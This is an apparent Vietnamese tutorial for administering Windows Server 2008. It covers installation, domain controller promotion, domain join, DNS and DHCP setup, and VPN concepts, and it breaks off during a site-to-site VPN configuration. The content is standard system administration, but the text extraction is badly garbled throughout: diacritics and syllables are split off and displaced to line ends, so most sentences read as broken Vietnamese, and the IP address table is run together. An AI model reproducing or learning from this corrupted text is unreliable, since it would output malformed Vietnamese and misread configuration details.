RAM h tr t i đa cho h th ng 32-bit là 4GB khi ch y phiên b nỗ ợ ố ệ ố ạ ả
Standard Edition và 64GB khi ch y phiên b n Enterprise và Datacenter. N uạ ả ế
ch y h th ng 64-bit, b nh RAM có th h tr lên d n 32GB và 2TB RAMạ ệ ố ộ ớ ể ỗ ợ ế
cho phiên b n Enterprise và Datacenter. Thêm vào đó, Windows Server 2008ả
h tr h th ng Itanium, tuy nhiên chip x lí Intel Itanium 2 nhân là c nỗ ợ ệ ố ử ầ
thi t. ế
2. CÁC CÁCH CÀI ĐẶT
Có 6 cách cài đ t Windows Server 2008ặ
T cài đ t các nâng c pự ặ ấ
Cài đ t t k ch b nặ ừ ị ả
S d ng Sconfigử ụ
Visual Core Configurator 2008
Cài đ t b ng cách s d ng Core Configurator 2.0ặ ằ ử ụ
Cài đ t tr c ti p t đĩa CD Windows Server 2008ặ ự ế ừ
3. NÂNG CẤP LÊN WINDOWS SERVER 2008
21
Nh ng phiên b n tr cữ ả ướ
Nâng c p lênấ
Windows Server
2008
Microsoft Windows Server 2003 R2 Standard,
Enterprise ho c DatacenterEditionặ
H tr đ y đỗ ợ ầ ủ
Microsoft Windows Server 2003 Service Pack
1(SP1) Standard, Enterprise ho c Datacenterặ
Edition
H tr đ y đỗ ợ ầ ủ
Microsoft Windows Server 2003 Service Pack 2
(SP2) Standard, Enterprise ho c Datacenterặ
Edition
H tr đ y đỗ ợ ầ ủ
Windows NT 4.0 Không h trỗ ợ
Windows 2000 Server Không h trỗ ợ
Windows XP Không h trỗ ợ
Windows Vista Không h trỗ ợ
Windows 7 Không h trỗ ợ
Đ nâng c p lên phiên b n Windows Server 2008, c n ph i ch y các h đi uể ấ ả ầ ả ạ ệ ề
hành c p đ server. Không th nâng c p các phiên b n Windows dành choở ấ ộ ể ấ ả
ng i dùng nh Windows XP ho c Windows Vista lên Windows Server 2008.ườ ư ặ
Đ nâng c p lên Windows Server 2008, h th ng c a b n ph i ch yể ấ ệ ố ủ ạ ả ạ
Windows Server 2003. Vi c nâng c p t Windows NT 4.0 và Windows 2000ệ ấ ừ
Server không đ c h tr . Vi c nâng c p t nh ng phiên b n Windows Serverượ ỗ ợ ệ ấ ừ ữ ả
2003 lên phiên b n Windows Server 2008 Server Core không đ c h tr .ả ượ ỗ ợ
Vi c nâng c p ch th c hi n đ c nh ng phiên b n gi ng nhau. Khi nângệ ấ ỉ ự ệ ượ ở ữ ả ố
c p lên phiên b n Windows Server 2008, m i c u hình thi t l p, file và cácấ ả ọ ấ ế ậ
ch ng trình đ u đ c gi l i ươ ề ượ ữ ạ
22
4. CÀI ĐẶT WINDOWS SERVER 2008
Đ t đĩa CD vào đĩa, kh i đ ng l i máy tính và b t đ u ti n hành quá trình càiặ ổ ở ộ ạ ắ ầ ế
đ t.ặ
Language to instalk : ngôn ng b n mu n hi n th .ữ ạ ố ể ị
Time and currency format : đ nh d ng th i gian và ti n t .ị ạ ờ ề ệ
Keyboard or input method : đ nh d ng bàn phím và ph ng th c nh pị ạ ươ ứ ậ
ch .Sau khi l a ch n, click Next đ ti p t c cài đ tữ ự ọ ể ế ụ ặ
Click Install now đ b t đ u cài đ t.ể ắ ầ ặ
23
L a ch n phiên b n Windows Server thích h p, đây chúng ta ch n phiênự ọ ả ợ ở ọ
b n Windows Server Standard without Hyper-V. Click Next đ ti p t c. ả ể ế ụ
T i b ng MICROSOFT PRE-RELEASE SOFTWARE LICENSE TERMS làạ ả
nh ng đi u kho n s d ng s n ph m c a Microsoft. Đánh d u ch n ữ ề ả ử ụ ả ẩ ủ ấ ọ vào I
accept the license terms đ ch p nh n nh ng đi u kho n đó và clickể ấ ậ ữ ề ả
Next đ ti p t c. ể ế ụ
24
Ch n ọ Custom (advaneced) đ ti n hành cài đ t tùy ch n. ể ế ặ ọ
Ti p theo là ch n đĩa đ cài d t Windows. Ti p t c click ế ọ ổ ể ặ ế ụ Next sau khi đã
ch n đĩa cài đ t. ọ ổ ặ
25
Đ i cho đ n khi hoàn t t cài đ t Windows Server 2008ợ ế ấ ặ
Sau khi h th ng hoàn t t cái đ t sẽ t đ ng đăng nh p v i tài kho nệ ố ấ ặ ự ộ ậ ờ ả
Administrator, tuy nhiên m t kh u đang tr ng thái tr ng (blank) vì th c nậ ẩ ở ạ ố ế ầ
ph i thi t l p m t kh u l n đăng nh p đ u tiên. ả ế ậ ậ ẩ ở ầ ậ ầ
Click OK đ ti n hành thay đ i m t kh u.Sau đó đăng nh p vào b ng m tể ế ổ ậ ẩ ậ ằ ậ
kh u v a thay đ i.ẩ ừ ổ
Đ n đây quá trình cài đ t k t thúc.ế ặ ế
26
Ch ng 5 ươ
D NG DOMAIN CONTROLLERỰ
Gi ng nh Windows Server 2003 sẽ v n c n ch y ố ư ẫ ầ ạ dcpromo t nh c l nhừ ắ ệ
Run, tuy nhiên c n ph i cài đ t ầ ả ặ Active Directory Domain Controller role,
đ u tiên b n cài đ t role, sau đó ch y ầ ạ ặ ạ dcpromo.Vào Server
ManagerRolesAdd Roles
Xu t hi n trang ấ ệ Before You Begin, nh n ấ Next đ ti p t c.ể ế ụ
27
Ch n ọ Active Directory Domain ServicesAdd Required Features để
cài đ t thêm các tính năng này v i Active Directory Server Role.ặ ớ
Sau khi ch n Active Directory DC Server Role, b n sẽ th y các thông tin vọ ạ ấ ề
Server Role.
Kích Install đ cài đ t các file yêu c u nh m ch y ể ặ ầ ằ ạ dcpromo
Cài đ t đ c th c hi n thành công. Kích ặ ượ ự ệ Close.
28
Trong bài này, chúng ta sẽ s d ng 2 máy.ử ụ
PC1: Là máy s d ng Windows Server 2008.ử ụ
PC2: Là máy s d ng Client s d ng Windows 7.ử ụ ử ụ
Quá trình cài đ t sẽ tr i qua 2 b c chính:ặ ả ướ
B c 1: Ch nh Preferred DNSướ ỉ
- b c này chúng ta sẽ ch nh Preferred DNS v chính máy tính c a chúng ta,Ở ướ ỉ ề ủ
đây là ip 192.168.1.1.ở
Trong tr ng h p gi s chúng ta quên làm b c này, thì quá trình nâng c pườ ợ ả ử ướ ấ
v n di n ra bình th ng, và Windows sẽ t ch nh Preferred DNS v đ a chẫ ễ ườ ự ỉ ề ị ỉ
192.168.1.1 Nh ng t t nh t các b n nên làm b c ch nh nàyư ố ấ ạ ướ ỉ
B c 2: Nâng c p lên Domain Controllerướ ấ
- B n vào Start-> Ch n Run, gõ dcpromo và Enter, sau đó l n l t làm theoạ ọ ầ ượ
các b c sau:ướ
29
Ti p nào.ế
Thao tác này sẽ kh i ch y ở ạ Welcome to the Active Directory Domain
Service Installation Wizard. Kích Next.
Sau đó ti p t c nh n ế ụ ấ Next.
Trong trang Choose a Deployment Configuration Create a new
domain in a new forest..
Trong trang Name the Forest Root Domain, nh p vào tên c a mi n trongậ ủ ề
h p nh p li u ộ ậ ệ FQDN of the forest room domain.Nh n ấ Next đ ti p t c.ể ế ụ
30
Nh n ấ Next đ ti p t c.ể ế ụ
Trong trang Set Forest Functional Level, ch n Windows Server 2008. Nh nọ ấ
Next đ ti p t c.ể ế ụ
Trong trang Additional Domain Controller Options, Ch n ọ DNS server
và kích Next.
31
M t h p tho i sẽ xu t hi n nói răng không th t o đ i bi u cho máy ch DNSộ ộ ạ ấ ệ ể ạ ạ ể ủ
này vì không th tìm th y vùng xác th c ho c nó không ch y Windows DNSể ấ ự ặ ạ
server. Lý do cho đi u này là vì đây là DC đ u tiên trên m ng. Nh n ề ầ ạ ấ Next để
ti p t c.ế ụ
Đ l i th m c Database, Log Files và SYSVOL ,kích ể ạ ư ụ Next.
32
Trong Directory Service Restore Mode Administrator Password, nh pậ
m t m t kh u m nh vào các h p nh p li u ộ ậ ẩ ạ ộ ậ ệ Password và Confirm
password.
Xác nh n các thông tin trên trang ậ Summary và kích Next.
33
Active Directory sẽ cài đ t. Đ t m t d u ki m vào h p ch n ặ ặ ộ ấ ể ộ ọ Reboot on
completion đ máy tính sẽ t đ ng kh i đ ng l i khi cài đ t DC đ c hoànể ự ộ ở ộ ạ ặ ượ
t t.ấ
34
Ch ng 6 ươ JOIN DOMAIN
Ch nh ip c a máy Windows XP sao cho cùng đ a ch c a l p mà ta đã gán máyỉ ủ ị ỉ ủ ớ ở
Server và DNS tr v đ a ch ip c a máy Server.ỏ ề ị ỉ ủ
Vào Start click ph i computer ch n properties. Ch n Tab Computer Nameả ọ ọ
Click vào Change đ m h p tho i Computer Name Change. Sau đó click ch nể ở ộ ạ ọ
Domain và nh p tên Domain vào khung ậ Oke
35
Nh p user Administrator và pass.ậ
Click OK và máy tính sẽ kh i đ ng l i. Sau khi kh i đ ng là máy đã đ c joinở ộ ạ ở ộ ượ
thành công. Vào server đ t o user và sau đó đăng nh p vào máy win xp để ạ ậ ể
ki m tra.ể
36
Ch ng 7 ươ
TRI N KHAI CÁC D CH V M NGỂ Ị Ụ Ạ
1. DỊCH VỤ DNS
1.1. Giới thiệu về DNS
DNS (Domain Name System) Server là máy ch đ c dùng đ phân gi iủ ượ ể ả
domain thành đ a ch IP và ng c l i. V cách th c ho t đ ng, DNS Server l uị ỉ ượ ạ ề ứ ạ ộ ư
tr m t c s d li u bao g m các b n ghi DNS và d ch v l ng nghe các yêuữ ộ ơ ở ữ ệ ồ ả ị ụ ắ
c u.Khi máy client g i yêu c u phân gi i đ n, DNS Server ti n hành tra c uầ ử ầ ả ế ế ứ
trong c s d li u và g i k t qu t ng ng v máy client. ơ ở ữ ệ ử ế ả ươ ứ ề
1.2. Cài đặt DNS
Vào Server Manager Roles Add Roles.T i b ng Select Server Roles, ch nạ ả ọ
DNS Server
Sau đó nh n ấ Next đ ti p t cể ế ụ
Ch n ọ Instal. T i b ng ạ ả Confirm Installation Selections xác nh n vi c cài đ t. ậ ệ ặ
37
Ch n ọ Close đ hoàn t t cài đ t.ể ấ ặ
1.3. Cấu hình DNS
Đ i v i DNS Server,thông th ng nên xây d ng đ ng th i hai h th ng là DNSố ớ ườ ự ồ ờ ệ ố
Server chính (Primary) và DNS Server d phòng (Secondary) dùng chung m tự ộ
c s d li u. V i ph ng pháp này,sẽ h n ch kh năng d ch v DNS bơ ở ữ ệ ớ ươ ạ ế ả ị ụ ị
ng ng khi có s c x y ra trên h th ng.ư ự ố ả ệ ố
Vào Start Administrative Tools DNS.
Nh p chu t ph i vào ấ ộ ả Forward Lookup Zones và ch n ọ New Zone.
38
T i b n Welcome to the New Zone Wizard ,ch n Nextạ ả ọ
T i b ng ạ ả Zone Type ch n Primary zoneọ đ c u hình DNS Server chính.ể ấ
Ch n Next. T i b ng ọ ạ ả Zone Name gõ tên domain vào, ch n Nextọ
39
T i b ng ạ ả New Zone Wizard, đ m c đ nh. Ch n ể ặ ị ọ Next.
Ch n ọ Next. T i b ng ạ ả Completing the New Zone Wizard xem l i thông tin. ạ
Sau đó ch n ọ Finish đ hoàn t t.ể ấ
Nh p chu t ph i vào ReverseLookup Zones và ch n New Zone. ấ ộ ả ọ
T i b ng Welcome to the New Zone Wizard ch n Next.ạ ả ọ
40
T i b ng ạ ả Zone Type ch n ọ Primary zone đ c u hình ch c năng reverse choể ấ ứ
DNS Server chính.
Ch n Next.T i b ng Reverse Lookup Zone Name ch n ki u IP c n phân gi i. ọ ạ ả ọ ể ầ ả Ở
đây ch n IPv4. ọ
Ch n Next. Đi n Network ID và ch n Next.ọ ề ọ
T i b ng Zone File đ m c đ nh. Ch n Next.ạ ả ể ặ ị ọ
T i b ng Dynamic Update ch n Allow both nonsecure dynamic updates. ạ ả ọ
41
Ch n Next và xem l i thông tin thi t l p, và sau đó ch n Finish đ k t thúc. ọ ạ ế ậ ọ ể ế
B sung các b n ghi DNS vào DNS Serverổ ả
Start Administrative Tools DNS. Nh p chu t ph i vào zone và ch n New -ấ ộ ả ọ
Gõ tên host vào m c Name, gõ đ a ch IP vào m c IP address. N u mu n t o raụ ị ỉ ụ ế ố ạ
m t b n ghi DNS phân gi i ng c t ng ng thì đánh d u ch n Createộ ả ả ượ ươ ứ ấ ọ
associated pointer (PTR) record.
Sau đó ch n Add Host.Xu t hi n thông báo thành công. ọ ấ ệ
42
Ki m traể
2. GIỚI THIỆU DỊCH VỤ DHCP
- D ch v DHCP cho phép chúng ta c p đ ng các thông s c u hình m ngị ụ ấ ộ ố ấ ạ
cho các máy tr m.(client). ạ
- C ch s d ng các thông s m ng đ c c p phát đ ng có u đi m h nơ ế ử ụ ố ạ ượ ấ ộ ư ể ơ
so v i c ch khai báo tĩnh các thông s m ng nh :ớ ơ ế ố ạ ư
- Kh c ph c đ c tình tr ng đ ng đ a ch IP và gi m chi phí qu n tr choắ ụ ượ ạ ụ ị ỉ ả ả ị
h th ng m ng.Giúp cho các nhà cung c p d ch v (ISP) ti t ki m đ cệ ố ạ ấ ị ụ ế ệ ượ
s l ng đ a ch IP th t (Public IP).Phù h p cho các máy tính th ngố ượ ị ỉ ậ ợ ườ
xuyên di chuy n qua l i gi a các m ng.K t h p v i h th ng m ngể ạ ữ ạ ế ợ ớ ệ ố ạ
không dây (Wireless) cung c p các đi m Hotspot nh : nhà ga, sân bay,ấ ể ư
tr ng h c…ườ ọ
43
2.1. Hoạt động của giao thức
Giao th c DHCP làm vi c theo mô hình client/server.Khi máy client kh i đ ng,ứ ệ ở ộ
máy sẽ g i broadcast gói tin DHCPDISCOVER, yêu c u m t server ph c vử ầ ộ ụ ụ
mình. Gói tin này cũng ch a đ a ch MAC c a máy client.Các máy Server trênứ ị ỉ ủ
m ng khi nh n đ c gói tin yêu c u đó, n u còn kh năng cung c p đ a ch IP,ạ ậ ượ ầ ế ả ấ ị ỉ
đ u g i l i cho máy Client gói tin DHCPOFFER, đ ngh cho thuê m t đ a ch IPề ử ạ ề ị ộ ị ỉ
trong m t kho n th i gian nh t đ nh, kèm theo là m t subnet mask và đ a chộ ả ờ ấ ị ộ ị ỉ
c a Server.ủ
2.2. Cài đặt DHCP trên windows server 2008
Vào Server Manger Roles Add Roles.
Nh n ấ Nexttrong m c ụ Roles ch n “ọ DHCP Server”. Nh n ấ Next.
Trong b ng này gi i thi u v DHCP và các đi m c n l u ý ả ớ ệ ề ể ầ ư Things to Note.
Ti p t c nh n Next.ế ụ ấ
Ch n card m ng s d ng d ch v này đây chúng ta ch có m t card m ngọ ạ ử ụ ị ụ ở ỉ ộ ạ
nên ti p t c nh n Next nh n ế ụ ấ ấ Next.
44
Trong m c “ụ Parent Domain” đi n tên domain và đi n IP DNS server m cề ề ở ụ
“Preferred DNS…” và nh n ấ Validate đ ki m tra và xác nh n t n t i và ti pể ể ậ ồ ạ ế
t c nh n ụ ấ Next.
Ti p t c nh n nextế ụ ấ
Ti p t c nh n ế ụ ấ Next.
45
Ti p t c b m Next. Trong B ng Configure DHCPv6 Stateless Mode ta ch nế ụ ấ ả ọ
Disable DHCPv6 stateless mode for this server và b m Nextấ
Ch n user có quy n Authorọ ề Next
Xác nh n l i thông tin tr c khi cài đ t d ch v DHCP. B m Install đ cài đ tậ ạ ướ ặ ị ụ ấ ể ặ
46
- Cài đ t Role hoàn t t, và nh n ặ ấ ấ Close
2.3. Cấu hình DHCP
2.3.1. Tạo Scop
Vào Administrative ToolsDHCP.
Nh n chu t ph i vào IPv4 và New Scope. ấ ộ ả
H p tho i ộ ạ New Scope hi n ra và ệ Next.
H p tho i ộ ạ Scope Name vàĐi n tên c a scope vào m c ề ủ ụ Name và nh n ấ Next
47
H p tho i ộ ạ IP Address Range,đi n thông s range IP c p phát và subnetề ố ấ
mask Next.
H p tho i ộ ạ Lease Duration: th i gian thuê đ a ch IP m c đ nh là 8 ngàyờ ị ỉ ặ ị
48
H p tho i ộ ạ Configuration DHCP Options yêu c u chúng ta c u hình thông sầ ấ ố
d ch v c a scope ngay bây gi ho c đ sau. đây ta ch n ị ụ ủ ờ ặ ể Ở ọ No, I will
configure these option later và nh n ấ Next.
B m ấ Fisnish đ k t thúcể ế
2.3.2. 3.2 Thay đổi options của Scope
- X scope c n thao tác và chu t ph i ổ ầ ộ ả scope optionsConfigure Options.
- H p tho i Scope Options hi n ra, tr ng Available Options là nh ngộ ạ ệ ở ườ ữ
thu c tính s n sàng màchúng ta có th thay đ i v i nh ng thu c tính đãộ ẵ ể ổ ớ ữ ộ
stick là nh ng thu c tính đã đ c c u hìnhtr c đó. ữ ộ ượ ấ ướ
- Chúng ta sẽ th c u hình default gateway l i cho scope này, ch n ử ấ ạ ọ Router.
Router Options hi n ta cho chúng ta thêm xóa và edit v i nh ng thu cệ ớ ữ ộ
tính khác cũng v yậ
49
Ki m traể
Ch ng 8 ươ
TRI N KHAI VPNỂ
1. Tìm hiểu VPN
Gi i pháp VPN (Virtual Private Network) đ c thi t k cho nh ng t ch c cóả ượ ế ế ữ ổ ứ
xu h ng tăng c ng thông tin t xa vì đ a bàn ho t đ ng r ng (trên toànướ ườ ừ ị ạ ộ ộ
qu c hay toàn c u). Tài nguyên trung tâm có th k t n i đ n t nhi uố ầ ở ể ế ố ế ừ ề
ngu n nên ti t ki m đ c đ c chi phí và th i gianồ ế ệ ượ ượ ờ
M t m ng VPN đi n hình bao g m m ng LAN chính t i tr s (Văn phòngộ ạ ể ồ ạ ạ ụ ở
chính), các m ng LAN khác t i nh ng văn phòng t xa, các đi m k t n i (nhạ ạ ữ ừ ể ế ố ư
'Văn phòng' t i gia) ho c ng i s d ng (Nhân viên di đ ng) truy c p đ n tạ ặ ườ ử ụ ộ ậ ế ừ
bên ngoài.
50
1.1. Khái niệm.
M ng riêng o hay VPN (Virtual Private Network) là m t m ng dành riêng đạ ả ộ ạ ể
k t n i các máy tính l i v i nhau thông qua m ng Internet công c ng. Nh ngế ố ạ ớ ạ ộ ữ
máy tính tham gia m ng riêng o sẽ "nhìn th y nhau" nh trong m t m ng n iạ ả ấ ư ộ ạ ộ
b - LAN (Local Area Network).ộ
Internet là m t môi tr ng công c ng, vi c chia s d li u có tính riêng tộ ườ ộ ệ ẻ ữ ệ ư
thông qua Internet là c c kỳ nguy hi m vì nh ng d li u đó có th d dàng bự ể ữ ữ ệ ể ễ ị
rò r , b ăn c p... M ng riêng o là giao th c tr giúp vi c k t n i các máy tínhỉ ị ắ ạ ả ứ ợ ệ ế ố
l i v i nhau thông qua m t kênh truy n d n d li u (tunel) riêng đã đ c mãạ ớ ộ ề ẫ ữ ệ ượ
hóa.
M ng riêng o giúp b o v d li u trong khi chúng đ c truy n trên Internetạ ả ả ệ ữ ệ ượ ề
vì v y m ng riêng o th ng đ c ng d ng trong các tr ng h p sau:ậ ạ ả ườ ượ ứ ụ ườ ợ
Làm vi c t xa: Truy c p t xa thông qua Internet vào m ng c a công ty đệ ừ ậ ừ ạ ủ ể
chia s d li u cũng nh th c thi các ng d ng n i b .ẻ ữ ệ ư ự ứ ụ ộ ộ
K t n i nhi u m ng v i nhau (Site-to-Site): N u công ty có nhi u văn phòng,ế ố ề ạ ớ ế ề
vi c k t n i các m ng l i v i nhau thành m t m ng th ng nh t sẽ đem l iệ ế ố ạ ạ ớ ộ ạ ố ấ ạ
hi u qu n t ng trong vi c qu n lý & chia s thông tin.ệ ả ấ ượ ệ ả ẻ
T o phiên làm vi c an toàn: M ng riêng o là gi i pháp t t & v i chi phí th pạ ệ ạ ả ả ố ớ ấ
cho m t s công vi c đòi h i tính b o m t cao nh qu n tr máy ch , website,ộ ố ệ ỏ ả ậ ư ả ị ủ
c s d li u...ơ ở ữ ệ
N u th ng xuyên làm vi c trên Internet & thông tin là tài s n vô giá, b n nênế ườ ệ ả ạ
ng d ng m ng riêng o vào công vi c c a mình.ứ ụ ạ ả ệ ủ
51
1.2. Các loại VPN.
Có hai lo i ph bi n hi n nay là VPN truy c p t xa (Remote-Access ) và VPNạ ổ ế ệ ậ ừ
đi m-n i-đi m (site-to-site)ể ố ể
VPN truy c p t xa còn đ c g i là m ng Dial-up riêng o (VPDN), là m t k tậ ừ ượ ọ ạ ả ộ ế
n i ng i dùng-đ n-LAN, th ng là nhu c u c a m t t ch c có nhi u nhânố ườ ế ườ ầ ủ ộ ổ ứ ề
viên c n liên h v i m ng riêng c a mình t r t nhi u đ a đi m xa. Ví dầ ệ ớ ạ ủ ừ ấ ề ị ể ở ụ
nh công ty mu n thi t l p m t VPN l n ph i c n đ n m t nhà cung c p d chư ố ế ậ ộ ớ ả ầ ế ộ ấ ị
v doanh nghi p (ESP). ESP này t o ra m t máy ch truy c p m ng (NAS) vàụ ệ ạ ộ ủ ậ ạ
cung c p cho nh ng ng i s d ng t xa m t ph n m m máy khách cho máyấ ữ ườ ử ụ ừ ộ ầ ề
tính c a h . Sau đó, ng i s d ng có th g i m t s mi n phí đ liên h v iủ ọ ườ ử ụ ể ọ ộ ố ễ ể ệ ớ
NAS và dùng ph n m m VPN máy khách đ truy c p vào m ng riêng c a côngầ ề ể ậ ạ ủ
ty. Lo i VPN này cho phép các k t n i an toàn, có m t mã.ạ ế ố ậ
Hình minh h a cho th y k t n i gi a Văn phòng chính và "Văn phòng" t i giaọ ấ ế ố ữ ạ
ho c nhân viên di đ ng là lo i VPN truy c p t xa).ặ ộ ạ ậ ừ
VPN đi m-n i-đi m là vi c s d ng m t mã dành cho nhi u ng i đ k t n iể ố ể ệ ử ụ ậ ề ườ ể ế ố
nhi u đi m c đ nh v i nhau thông qua m t m ng công c ng nh Internet.ề ể ố ị ớ ộ ạ ộ ư
Lo i này có th d a trên Intranet ho c Extranet. Lo i d a trên Intranet: N uạ ể ự ặ ạ ự ế
m t công ty có vài đ a đi m t xa mu n tham gia vào m t m ng riêng duyộ ị ể ừ ố ộ ạ
nh t, h có th t o ra m t VPN intranet (VPN n i b ) đ n i LAN v i LAN.ấ ọ ể ạ ộ ộ ộ ể ố ớ
Lo i d a trên Extranet: Khi m t công ty có m i quan h m t thi t v i m tạ ự ộ ố ệ ậ ế ớ ộ
công ty khác (ví d nh đ i tác cung c p, khách hàng...), h có th xây d ngụ ư ố ấ ọ ể ự
m t VPN extranet (VPN m r ng) k t n i LAN v i LAN đ nhi u t ch c khácộ ở ộ ế ố ớ ể ề ổ ứ
nhau có th làm vi c trên m t môi tr ng chung.ể ệ ộ ườ
Trong hình minh h a trên, k t n i gi a Văn phòng chính và Văn phòng t xa làọ ế ố ữ ừ
lo i VPN Intranet, k t n i gi a Văn phòng chính v i Đ i tác kinh doanh là VPNạ ế ố ữ ớ ố
Extranet.
1.3. Bảo mật trong VPN
T ng l a (firewall) là rào ch n v ng ch c gi a m ng riêng và Internet. B nườ ử ắ ữ ắ ữ ạ ạ
có th thi t l p các t ng l a đ h n ch s l ng c ng m , lo i gói tin vàể ế ậ ườ ử ể ạ ế ố ượ ổ ở ạ
giao th c đ c chuy n qua. M t s s n ph m dùng cho VPN nh router 1700ứ ượ ể ộ ố ả ẩ ư
c a Cisco có th nâng c p đ g p nh ng tính năng c a t ng l a b ng cáchủ ể ấ ể ộ ữ ủ ườ ử ằ
52
ch y h đi u hành Internet Cisco IOS thích h p. T t nh t là hãy cài t ng l aạ ệ ề ợ ố ấ ườ ử
th t t t tr c khi thi t l p VPN.ậ ố ướ ế ậ
M t mã truy c p là khi m t máy tính mã hóa d li u và g i nó t i m t máyậ ậ ộ ữ ệ ử ớ ộ
tính khác thì ch có máy đó m i gi i mã đ c. Có hai lo i là m t mã riêng vàỉ ớ ả ượ ạ ậ
m t mã chung.ậ
M t mã riêng (Symmetric-Key Encryption): M i máy tính đ u có m t mã bíậ ỗ ề ộ
m t đ mã hóa gói tin tr c khi g i t i máy tính khác trong m ng. Mã riêngậ ể ướ ử ớ ạ
yêu c u b n ph i bi t mình đang liên h v i nh ng máy tính nào đ có th càiầ ạ ả ế ệ ớ ữ ể ể
mã lên đó, đ máy tính c a ng i nh n có th gi i mã đ c.ể ủ ườ ậ ể ả ượ
M t mã chung (Public-Key Encryption) k t h p mã riêng và m t mã công c ng.ậ ế ợ ộ ộ
Mã riêng này ch có máy c a b n nh n bi t, còn mã chung thì do máy c a b nỉ ủ ạ ậ ế ủ ạ
c p cho b t kỳ máy nào mu n liên h (m t cách an toàn) v i nó. Đ gi i mãấ ấ ố ệ ộ ớ ể ả
m t message, máy tính ph i dùng mã chung đ c máy tính ngu n cung c p,ộ ả ượ ồ ấ
đ ng th i c n đ n mã riêng c a nó n a. Có m t ng d ng lo i này đ c dùngồ ờ ầ ế ủ ữ ộ ứ ụ ạ ượ
r t ph bi n là Pretty Good Privacy (PGP), cho phép b n mã hóa h u nh b tấ ổ ế ạ ầ ư ấ
c th gì.ứ ứ
Giao th c b o m t giao th c Internet (IPSec) cung c p nh ng tính năng anứ ả ậ ứ ấ ữ
ninh cao c p nh các thu t toán mã hóa t t h n, quá trình th m đ nh quy nấ ư ậ ố ơ ẩ ị ề
đăng nh p toàn di n h n.ậ ệ ơ
IPSec có hai c ch mã hóa là Tunnel và Transport. Tunnel mã hóa tiêu đơ ế ề
(header) và kích th c c a m i gói tin còn Transport ch mã hóa kích th c.ướ ủ ỗ ỉ ướ
Ch nh ng h th ng nào h tr IPSec m i có th t n d ng đ c giao th c này.ỉ ữ ệ ố ỗ ợ ớ ể ậ ụ ượ ứ
Ngoài ra, t t c các thi t b ph i s d ng m t mã khóa chung và các t ng l aấ ả ế ị ả ử ụ ộ ườ ử
trên m i h th ng ph i có các thi t l p b o m t gi ng nhau. IPSec có th mãỗ ệ ố ả ế ậ ả ậ ố ể
hóa d li u gi a nhi u thi t b khác nhau nh router v i router, firewall v iữ ệ ữ ề ế ị ư ớ ớ
router, PC v i router, PC v i máy ch .ớ ớ ủ
Máy ch AAA là vi t t t c a ba ch Authentication (th m đ nh quy n truyủ ế ắ ủ ữ ẩ ị ề
c p), Authorization (cho phép) và Accounting (ki m soát). Các server nàyậ ể
đ c dùng đ đ m b o truy c p an toàn h n. Khi yêu c u thi t l p m t k tượ ể ả ả ậ ơ ầ ế ậ ộ ế
n i đ c g i t i t máy khách, nó sẽ ph i qua máy ch AAA đ ki m tra. Cácố ượ ử ớ ừ ả ủ ể ể
thông tin v nh ng ho t đ ng c a ng i s d ng là h t s c c n thi t đ theoề ữ ạ ộ ủ ườ ử ụ ế ứ ầ ế ể
dõi vì m c đích an toàn.ụ
53
1.4. Sản phẩm công nghệ dành cho VPN
Tùy vào lo i VPN (truy c p t xa hay đi m-n i-đi m), b n sẽ c n ph i cài đ tạ ậ ừ ể ố ể ạ ầ ả ặ
nh ng b ph n h p thành nào đó đ thi t l p m ng riêng o. Đó có th là:ữ ộ ậ ợ ể ế ậ ạ ả ể
- Ph n m m cho desktop c a máy khách dành cho ng i s d ng t xa.ầ ề ủ ườ ử ụ ừ
- Ph n c ng cao c p nh b x lý trung tâm VPN ho c firewall b o m tầ ứ ấ ư ộ ử ặ ả ậ
PIX.
- Server VPN cao c p dành cho d ch v Dial-up.ấ ị ụ
- NAS (máy ch truy c p m ng) do nhà cung c p s d ng đ ph c vủ ậ ạ ấ ử ụ ể ụ ụ
ng i s d ng t xa.ườ ử ụ ừ
- M ng VPN và trung tâm qu n lý.ạ ả
1.5. Bộ xử lý trung tâm VPN
Có nhi u lo i máy x lý VPN c a các hãng khác nhau, nh ng s n ph m c aề ạ ử ủ ư ả ẩ ủ
Cisco t ra v t tr i m t s tính năng. Tích h p các kỹ thu t mã hóa và th mỏ ượ ộ ở ộ ố ợ ậ ẩ
đ nh quy n truy c p cao c p nh t hi n nay, máy x lý VPN đ c thi t kị ề ậ ấ ấ ệ ử ượ ế ế
chuyên bi t cho lo i m ng này. Chúng ch a các module x lý mã hóa SEP, choệ ạ ạ ứ ử
phép ng i s d ng d dàng tăng dung l ng và s l ng gói tin truy n t i.ườ ử ụ ễ ượ ố ượ ề ả
Dòng s n ph m có các model thích h p cho các mô hình doanh nghi p t nhả ẩ ợ ệ ừ ỏ
đ n l n (t 100 cho đ n 10.000 đi m k t n i t xa truy c p cùng lúc).ế ớ ừ ế ể ế ố ừ ậ
1.6. Router dùng cho VPN
Thi t b này cung c p các tính năng truy n d n, b o m t. D a trên h đi uế ị ấ ề ẫ ả ậ ự ệ ề
hành Internet IOS c a mình, hãng Cisco phát tri n lo i router thích h p choủ ể ạ ợ
m i tr ng h p, t truy c p nhà-t i-văn phòng cho đ n nhu c u c a cácọ ườ ợ ừ ậ ớ ế ầ ủ
doanh nghi p quy mô l n.ệ ớ
1.7. Tường lửa PIX của Cisco
Firewall trao đ i Internet riêng (Private Internet Exchange) bao g m m t cổ ồ ộ ơ
ch d ch đ a ch m ng r t m nh, máy ch proxy, b l c gói tin, các tính năngế ị ị ỉ ạ ấ ạ ủ ộ ọ
VPN và ch n truy c p b t h p pháp.ặ ậ ấ ợ
Thay vì dùng IOS, thi t b này có h đi u hành v i kh năng t ch c cao, xoayế ị ệ ề ớ ả ổ ứ
s đ c v i nhi u giao th c, ho t đ ng r t m nh b ng cách t p trung vào IP.ở ượ ớ ề ứ ạ ộ ấ ạ ằ ậ
54
2. VPN SITE TO SITE
2.1. Chuẩn bị:
- 2 windows server 2008
- 2 windows 2007
+ Máy PC 1 windows 2007 có ip 192.168.1.2. máy này s ping thông v i ẻ ớ
PC 2 là windows server 2008 có đ a ch ip là 192.168.1.1.ị ỉ
+ Máy PC 3 windows 2007 có ip 192.168.2.2 máy này s ping thông v i ẻ ớ
PC 4 là windows server 2008 có đ a ch ip là 192.168.2.1.ị ỉ
2.2. Đặt IP cho 4 máy
Card Lan Card CrossServer 1 10.0.0.1/24 192.168.1.1/24Server 2 172.16.1.1/24 192.168.1.2/24Client 1 10.0.0.2/24Client 2 172.16.1.2/24
T o user saigon trên máy server 1ạ
T o user hanoi trên máy server 2ạ
55
2.3. Tiến hành cấu hình trên 2 server.
Ch n properties ->ch n tab dial – in -> check ch n allow access ọ ọ ọ
Trên máy server1
Vào server manager ->add roles
56
Ch n network policy and access services -> next ọ
